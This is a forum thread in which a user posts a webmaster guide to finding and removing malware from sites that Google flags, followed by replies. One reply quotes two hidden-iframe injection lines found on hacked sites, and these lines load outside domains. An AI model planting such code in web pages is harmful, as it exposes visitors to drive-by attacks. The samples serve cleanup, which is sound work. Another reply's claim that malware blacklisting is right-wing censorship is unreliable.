Help! YOUR site has been flagged by Google as suspiciou
by beckerist
about 5 years ago

Help! Google has listed your (my) site as suspicious!

I’m seeing an influx of these on this board, so I thought I’d take the time to show YOU how to figure this out on your own. Note, these instructions are for intermediate to expert webmasters. If you do not know what an .htaccess file is, what SQL injection means or what chmod does, I suggest you open a new Google tab and start learning some definitions! NOTE: EVERYONE IS ENCOURAGED TO LEARN!!!

A. Why is my site being flagged?
1. Google’s fault
2. Hosting providers fault
3. My fault
4. Most likely…
B. How do I remove the baddness?
1. Research
2. Identifying
3. Removing
4. Preventing
5. Rule of thumb — knowledge is power
C. How do I get back into Google’s good graces?
1. Links

A. Why is my site being flagged?

— Short answer: chances are you have badware on your site. This is not always the case though.

1. Google’s fault: On Saturday, January 31st 2009, during the wee hours of the early morn’, every single webpage (searchable through Google) contained badware! In reality, Google has since explained that they updated the list of suspicious sites and inadvertently included a wild card entry, flagging the whole Internet. It was resolved about 45 minutes later.

2. Hosting providers fault: In my personal experience, this accounts for roughly 20% of all cases I’ve come across. This can manifest itself in a few different ways. Your hosting provider:
-has old/outdated/buggy/insecure code "pre-packaged" for your site
-has not properly secured their own servers
-has gullible tech-support
The ways to resolve this all involve either contacting your provider OR switching providers. The first is resolved easily by sending a list of the buggy/outdated software (for instance: phpBB2 vs. phpBB3) to them, with maybe links to the newest versions. If the company cares about security, they will hop right on it!
The second is again up to you (in a way.) If their servers are not secure, they probably aren’t even aware of it. Once you’ve figured out what your site is infected with (see B1-2) you can inform your provider with these details. A big deterrent to reporting these issues is "eh, someone else will do it" or "I’m sure they’ll fix it." If they don’t know, tell them! If you use a completely hosted service (something like blogspot for instance) and THEY have buggy software, again all you can do is report.
The last issue is something that is unfortunately unavoidable. I recommend researching each provider BEFORE purchasing their services. There have been reported cases of "hacker calls tech support, claims to be someone else (like a government official or RIAA lawyer,) tech support is either scared, stupid, or maybe just naive and does something with the power they have to disrupt YOUR service."
It happens, it’s annoying, but if this is what happened you should be able to find out quickly. All customer service departments world-wide record or at least transcribe the details of every call.

3. My fault: Chances are, the reason you have badware is because of something YOU did. Say you install a CMS. In the installation process you are required to chmod some files to 777 so that they may be written to a static file. Upon finishing the installation you forget to delete the installation folder or chmod. You have left a file (full of settings AND with full writable and executable rights to EVERYONE) on your server. It isn’t a big stretch for Mrs. Hacker to append some code to the beginning of the file forcing your entire site to redirect to hers.

4. Most likely: it’s a combination of 1 and 2. Web servers and hosting providers follow the rule just like everything else: freedom and security are exclusive. The more freedom you give your webmasters, the less secure your system becomes. By allowing you to install buggy code, and by not preventing bad code from being executed, the hosting providers are essentially giving you the freedom (vs. security of NOT) to open their systems up to this badware. If they didn’t though, there are plenty of other providers out there you could turn to to meet your demands! It’s a catch-22, and as a result we unfortunately (fortunately?) have to deal with badware.

B. How do I remove the badness?

— Short answer: research, identification, removal and prevention!

1. Research: There are plenty of places you can visit to determine what is wrong with your site. Personally I use Google for just about every single step! The first step of the research is already done if you’ve seen your site flagged through a web search. You know that something is wrong. The next step is knowing where to turn to figure out exactly what that is.
2. Identifying: First, I suggest you go here:
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.yoursite.com/the_page_that’s_infected.html
This will show you all the pages on your site that are affected as well as MORE information that is relevant to figuring out what’s wrong. Take note of the websites that your users might be redirected to, as well as the websites that are executing malicious code.
The next step I take from here is to plug those sites (more than 1 at a time) into Google and see if anyone else has experienced this particular variation. Chances are you’re not the first, and if you’re lucky a resolution might already have been posted! If not, it’s time to move to the "manual removal" section.
Other links to help you determine what the issue might be:
http://www.unmaskparasites.com/security-report/?page=http://www.yoursite.com/the_page_that’s_infected.html (if it’s up)
http://stopbadware.org/home/reportsearch?searchtext=http://www.yoursite.com/the_page_that’s_infected.html

3. Removal: Manual removal of these baddies can come in a few different flavors. The most important thing to know is where to look.
A) A lot of hijackings occur through the manipulation of config files on the server. Know what software your web server is running! If it’s Apache, you will need to check your http.conf file, your .htaccess file(s) and your .htusers files for any anomalies. If you don’t know how to do this, I again suggest using Google to look it up! If you are using IIS make sure there are no unknown modules and no strange users. Other web servers most likely will have some sort of setup AND some sort of execution. Make sure in all instances to work your way through all the possible areas of execution on your server (can be found on Google.)
B) More hijackings can occur through the manipulation of your database! Using SQL injection methods, hackers can insert ANY plain-text code (ie: javascript) into a page that just blindly posts and reads without any sort of security. If you have written a script where you use a GET variable directly in an SQL query, anyone with a bit of know-how can do WHATEVER THEY WANT in your database. Say you have a blog with comments, and the comments are not secure…someone could either post a comment OR just go to the posting URL in their web browser with the appropriate code, and as a result can put malicious code into your site. If you use a database, check that too for any anomalies. Most DB engines have a search function. Use it to look for the sites listed you found on the Safebrowsing Google page.
C) This is the easiest one, simply use your editor (Frontpage, Dreamweaver, etc) to "get" your entire site, and search through your local files for any instances of those pages, again found on the SB Google page.

4. Prevention: Dealing with each of the categories listed in #3, there are a few things you can do:
A) Make sure that the server hosing your web pages is secure! Have your hosting provider TELL you when the last time they ran Windows Updates was. Verify the version numbers of the scripts you are running (bulletin boards, etc…) are the MOST up to date. Things are upgraded for a reason, and the main reason is generally security! If they aren’t, talk to your hosting provider as it only helps them too.
B) Make sure that the scripts YOU write are secure. Research possible SQL injection methods, use strong passwords, and NEVER TRUST ANYONE. Even if you and only you know about a secret script that isn’t secure on your website doesn’t mean it will stay that way. Lock everything down, even if it’s not exactly convenient. There are always secure ways of doing what you need to do.
C) Be pro-active. Look at your pages, scour through every piece of them. Know your sites! Prevention can only fully happen if you KNOW how the offense occurred. If you don’t, than you need to dive deeper into your pages because someone else certainly has.

5. Rule of thumb: Knowledge is power. If you learn ANYTHING from this please share! The more people that know, the harder it makes it for the hackers.

C. How do I get back into Google’s good graces?
1. Links: http://www.google.com/support/webmasters/bin/answer.py?answer=35843

So that’s it! I hope you can take something from this, but as always feel free to post your questions on Badwarebusters.org

by erica
about 5 years ago

WOW, this is a great resource page – Thanks for taking the time to create this!

Erica

by anirban
about 5 years ago

Awesome Info.. will go along way in helping people :-)

-Anirban

by denis
about 5 years ago

Great post!

I have an addition to the Prevention section:

D). Beware of spyware on your local computer. Trojans can steal your passwords and do whatever they want with your site.

Denis – www.UnmaskParasites.com

by beckerist
about 5 years ago

Good call. I will be posting more of these in the next few weeks. So far I have 2 started (just outlines so far) in discussing Spyware prevention on your personal local computer, as well as another discussing methods of HOW spware is built to give individuals a sense of what to expect, what to look for and how to anticipate it.

The other topics I will probably discuss include "Using a virtual image to analyze badware," "Where on the internet should you report [XXXXXXX]," and "badware vs. spyware vs. (good and bad) adware vs. shareware"

by zaaylo
about 5 years ago

Great Link suggested….really gonna help me alot.
Thanks Denis

by Mackos
about 5 years ago

beckerist they have to stick your post on the top of this website !
Great post , probably thanks to this one my website will be unflagged :)

by Cometcom1
about 5 years ago

Hi Mackos,

The posting has been flagged by the moderators, and I agree it is a great post.

There ought to be much more information like this available through the site resources – imho.

This is the kind of information that really helps, though I’d personally rewrite the contents slightly for better readability. – I’m confident that this information will not be lost and eventually be incorporated into the site as a valuable resource.

by davidhartley
about 5 years ago

A good post, but I’m noticing a pattern of apparent right-wing censorship taking place under the DISGUISE of “malware” … “protection”
It is a typical fascist technique, to send in some “terrorist” to soften up “the public” so that the fascists extreme transgressions against freedom, liberty, “net neutrality,” freedom of information, etc … can be swept under the rug & ignored.

Organic Consumers Associations and Judicial Watch are two sites which have been ATTACKED BY BOGUS “badware” reports and blacklisted in google.

Seeing that badware.org is associated with HARVARD — the home of Skull & Bones cronyism does little to dilute the appearance of right-wing conspiracy.

by acosonic
about 5 years ago

Hi guys, all websites on my hosting reseller account were hacked, due to shared hosting etc…

Here is which code I found inside them:
<iframe src=\”http://xtrarobotz.com/?click=7B934CB\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>
and <iframe src=\”http://goooogleadsence.biz/?click=176CCDA\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>

I’ve done a little php code which crawls trough all subfolders you run it in, and cleans that malicious codes, you can grab it from
http://acosonic.com/archives/162/has-your-website-beign-blocked-by-google/

by tarosic
almost 5 years ago

This may have been the case 3 months ago, however, Denis is right.
At this point, almost every case I see of maliciously flagged sites comes from the iframe injection that has made it’s presence felt on the internet recently.

When this infection hits a site it has a 99.9% probability that it is in fact your fault.
Do you use a browser that allows pop-ups, or javascript?
Do you use a virus scanner that’s free? Or that hasn’t been updated recently? Or that has terrible heuristic results in comparison tests?
Are you running Microsoft Windows?
All of these can drastically increase the chances that you will be affected by a virus or exploit that can cause a compromise of your website.
Yes, sometimes hosting providers and Google make errors, but if that was happening all the time, they wouldn’t be able to stay in business.

If you have a script that you’re running?? Get the RSS feed for new updates and update it frequently.

Take backups, lots of them.

Most hosting where you share an account has some level of virtualizing a private system where you don’t interact with the other accounts.
This means that most of the time, their accounts cannot interact with yours at all.

And be Proactive about protecting your site.
Once Google has blacklisted it, you’re already behind the curve.
Ask your host how you can protect your site better, they will have specific recommendations that are unique to the hosting that you have with them.

by seomum
almost 5 years ago

hi need a very urgent help?

Problem facing: Google says “distributing badwares” etc.

Website url: http://www.bhutantourpackage.com

Date detected: on 21st of may

Details: on 21st of may, only some of my pages Google showing as “distributing malware” But on 22nd of may Google has started showing of entire websites.

I am trying to figure out what is the problem from last 24 hours but still couldn’t get it.

Let me tell what i have done so far:

1. I have deleted that existing web hosting A/C and got new hosting A/C, uploaded whole files there.

2. Saw the source code of downloaded files, but i can’t see any new injected or badware providing code at my entire website.

3. I check each and every page of the site but there is no where code i can found in the source code

So please let me know, how to find that problem? For a urgent help you can mail me as well: [email protected]

regards,
Arshad

by Cometcom1
almost 5 years ago

@seomum

I think you will find that one of your script files have been compromised and additional code inserted. This code is likely obfuscated so that it is hard to read for a human, but easy to execute by a computer.

Use Google Webmaster Tool to get page references for the page which contained the detected malicious script and also use this tool to request review once the script has been removed.

by dynamicnet
almost 5 years ago

I’m troubled by #2 – Hosting providers fault – on the foundation some providers secure their servers well, but allow their customers to install their own software for which the customers need to keep up to date. Add various web site infections due to infected personal computers that have site access, and you have even very secure hosts vulnerable… is it still the hosting providers fault?

by beckerist
almost 5 years ago

Not really. Again it boils down to freedom vs security. If they are not keeping their own provided applications updated, then yes, it is their fault. If they allow you to upload EVERYTHING then it’s your responsibility to make sure it’s clean before it goes up. Keep your Anti-virus program up to date, and make sure to study anything suspicious.

by Typhon
over 4 years ago

Actually if they where actually familar with google and common ISP policies, this article would likely not have been written.

by Typhon
over 4 years ago

Yea know I honestly find this all funny. Here are my reasons why based on some of the responsises.
1) It’s google’s fault
I’d love a better explination then techno babble about something that google does not do as it would be bad for there business to do it in the first place. Also if it was google the google logo, and redirect to fix it would go to google. That’s also there standard policy from day 1.

2) It’s my fault.
All I did was click the url, and all my loggers and such tell me nothing has changed. So how is that my fault for going to the same sight time and time again, only to have it suddenly blocked, and not by Google but by you guys.

3) It’s the ISP’s fault
Well lets look at ISP standard prodecure for blocking a site.
Did I tell them to block a site… nope.
Did I tell them to turn the parental locks on… nope.
Did I tell them to block the site for me in anyway… nope.
As it’s standard ISP policy to only block sites that I tell them to, and all my answers to those questions are no, I don’t see how this is possible.

So saddly I don’t see how any of this article helps, other then the fact that it’s NOT goggle, me or a ISP blocking the site it’s you guys. So please stop trying to justify yourselves, as well as blame others. It doesn’t look good for you guys and it’s defently not good for business.

by beckerist
over 4 years ago

It might help if your response were coherent. Instead of complaining, why don’t YOU write a constructive article?

by Kaleh
over 4 years ago

@Typhon

So saddly I don’t see how any of this article helps, other then the fact that it’s NOT goggle, me or a ISP blocking the site it’s you guys. So please stop trying to justify yourselves, as well as blame others. It doesn’t look good for you guys and it’s defently not good for business.

I think you may have misunderstood the role of BadwareBusters/StopBadware in relation to sites, in the Google search results, being flagged as suspicious.

Google flags sites in their search results as suspicious, not BadwareBusters/StopBadware.

http://stopbadware.org/home/faq#partnerwarnings-involved
How and why is StopBadware.org involved in Google’s warnings?
Google independently checks the web for badware and badware-linking code, and places warnings in its own search results. StopBadware’s role is to help site owners who want to remove the warnings to learn about badware and website security. StopBadware also administers an independent review process through which a website owner can request the removal of a warning.

Although Google’s warning pages contain a link to the StopBadware.org site for more information, the decision to post a warning page is an independent decision made by Google, not by StopBadware, and does not reflect any testing or review by us in advance.

About Contact Us Terms & Conditions Privacy Policy Copyright